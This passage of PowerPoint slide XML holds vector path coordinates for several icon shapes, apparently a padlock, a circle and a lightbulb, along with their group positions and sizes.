                  <a:pt x="0" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="47" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="189" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="113" y="212"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="21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2400"/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B5B3125C-6BBF-49A5-921C-842DE47280AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8838900" y="2133600"/>
            <a:ext cx="648000" cy="648000"/>
            <a:chOff x="8800800" y="2133600"/>
            <a:chExt cx="648000" cy="648000"/>
          </a:xfrm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9FF52AB-A02A-4D3C-A859-80BB3B554EAD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8800800" y="2133600"/>
              <a:ext cx="648000" cy="648000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="195927" h="195927">
                  <a:moveTo>
                    <a:pt x="97964" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116200" y="208"/>
                    <a:pt x="132679" y="4667"/>
                    <a:pt x="147399" y="13379"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162120" y="22090"/>
                    <a:pt x="173837" y="33807"/>
                    <a:pt x="182548" y="48528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191260" y="63248"/>
                    <a:pt x="195719" y="79727"/>
                    <a:pt x="195927" y="97963"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195719" y="116199"/>
                    <a:pt x="191260" y="132677"/>
                    <a:pt x="182548" y="147398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173837" y="162119"/>
                    <a:pt x="162120" y="173836"/>
                    <a:pt x="147399" y="182547"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132679" y="191259"/>
                    <a:pt x="116200" y="195719"/>
                    <a:pt x="97964" y="195927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79728" y="195719"/>
                    <a:pt x="63250" y="191259"/>
                    <a:pt x="48529" y="182547"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33808" y="173836"/>
                    <a:pt x="22091" y="162119"/>
                    <a:pt x="13380" y="147398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4668" y="132677"/>
                    <a:pt x="208" y="116199"/>
                    <a:pt x="0" y="97963"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="79727"/>
                    <a:pt x="4668" y="63248"/>
                    <a:pt x="13380" y="48528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22091" y="33807"/>
                    <a:pt x="33808" y="22090"/>
                    <a:pt x="48529" y="13379"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63250" y="4667"/>
                    <a:pt x="79728" y="208"/>
                    <a:pt x="97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914217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1828434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2742651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3656868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4571086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5485303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6399520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7313737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609539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tr-TR" sz="120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44" name="Freeform 108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{020821A1-62B6-48A6-8702-8616933F12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40835" y="2229721"/>
              <a:ext cx="389451" cy="497368"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="136" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="92" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="56" y="35"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="25" y="67"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="7" y="107"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="153"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="5" y="187"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="25" y="236"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="63" y="274"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="69" y="278"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="76" y="301"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="76" y="354"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="83" y="372"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="140" y="401"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="405"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="214" y="376"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="225" y="367"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="228" y="303"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="230" y="289"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="243" y="270"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="261" y="256"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="288" y="216"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="301" y="169"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="301" y="136"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="290" y="93"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="268" y="57"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="236" y="28"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="196" y="8"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="100" y="354"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="203" y="303"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="100" y="303"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="203" y="303"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="230" y="249"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="210" y="270"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="96" y="278"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="85" y="260"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="67" y="245"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="40" y="211"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="27" y="167"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="25" y="140"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="36" y="104"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="54" y="71"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="82" y="47"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="114" y="31"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="26"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="176" y="29"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="212" y="42"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="239" y="64"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="261" y="93"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="274" y="127"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="277" y="153"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="270" y="192"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="250" y="229"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="232" y="249"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="303" h="405">
                  <a:moveTo>
                    <a:pt x="150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="136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2" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163" y="401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281" y="231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301" y="136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="379"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="100" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="379"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="203" y="303"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="203" y="328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100" y="328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="303"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="232" y="249"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272" y="115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250" y="229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="24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2400"/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69EAFEC2-4307-486D-A0D7-AA4148E7A56B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8838900" y="3847800"/>
            <a:ext cx="648000" cy="648000"/>
            <a:chOff x="8839200" y="3847800"/>
            <a:chExt cx="648000" cy="648000"/>
          </a:xfrm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B48D8F62-0FC6-41B1-B943-8D07B2C99059}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
